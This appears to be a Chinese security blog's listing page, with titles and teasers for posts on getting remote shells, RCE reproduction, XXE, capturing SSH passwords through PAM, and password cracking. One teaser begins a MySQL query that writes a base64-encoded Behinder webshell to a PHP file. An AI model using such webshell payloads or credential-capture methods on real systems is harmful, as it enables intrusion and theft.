网络安全 第11页
XSS社区是网络安全爱好者聚集地
无公网 IPv4 云主机上线对方电脑-XSS博客

无公网 IPv4 云主机上线对方电脑

无公网 IPv4 云主机上线对方电脑
xss-admin的头像-XSS博客xss-admin2年前
033511
记一次Node.js站点渗透-XSS博客

记一次Node.js站点渗透

前言 遇到一个站,后端是Node.js写的,对于这种类型的站点,一般比较难getshell,但也实现了最终的目标,拿到后台权限 信息搜集 先进行常规的信息搜集,子域名扫描、端口扫描、目录扫描等 这个...
xss-admin的头像-XSS博客xss-admin2年前
015511
ThinkPHP多语言模块文件包含RCE复现详细教程-XSS博客
日常技巧 - 抓取 jar 包 payload 数据-XSS博客

日常技巧 – 抓取 jar 包 payload 数据

fiddler 设置 Connections 端口为 8888 代理设置为 burp 监听的 127.0.0.1:8080 java -DproxySet=true -DproxyHost=localhost -DproxyPort=8888 -jar yonyouNC_unserialize_tool.jar
xss-admin的头像-XSS博客xss-admin2年前
018511
201-A18-xml外部实体注入(XXE漏洞)-XSS博客

201-A18-xml外部实体注入(XXE漏洞)

PS: 文中 XML 代码用代码框显示会出错,故用黄色标明(格式已做调整可以直接使用) 准备工作: Centos7 主机一台,安装 httpd、php 以及 xml 服务 yum -y install httpd httpd-devel php php-xm...
xss-admin的头像-XSS博客xss-admin2年前
018711
PAM_EXEC 不用第三方应用和重启抓取ssh密码-XSS博客

PAM_EXEC 不用第三方应用和重启抓取ssh密码

PAM_EXEC 不用第三方应用和重启抓取ssh密码
xss-admin的头像-XSS博客xss-admin2年前
043811
渗透测试 - 如何高效率挖掘漏洞-XSS博客

渗透测试 – 如何高效率挖掘漏洞

前言 1、做渗透由始至终,忌讳穿插其他项目进行 2、按顺序细心测试每一个功能点,保证漏洞无遗漏 3、山穷水复疑无路,柳暗花明又一村,一个点利用不到,可以灵活变通尝试其他方向 漏扫工具 AWVS...
xss-admin的头像-XSS博客xss-admin2年前
018811
mysql写冰蝎马-XSS博客

mysql写冰蝎马

select '<?php file_put_contents('abab.php',base64_decode('Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0l...
xss-admin的头像-XSS博客xss-admin2年前
012111
密码突破-XSS博客

密码突破

一、简介 在我们取得目标哈希或者遇到受密码保护的文件时,需要取得解密密码或明文密码,此时就可以使用hashcat、john来进行密码破解,以此取得我们想要的。 二、示例 2.1 使用格式 hashcat:ha...
xss-admin的头像-XSS博客xss-admin2年前
012511
针对Swagger接口泄露未授权的初探-XSS博客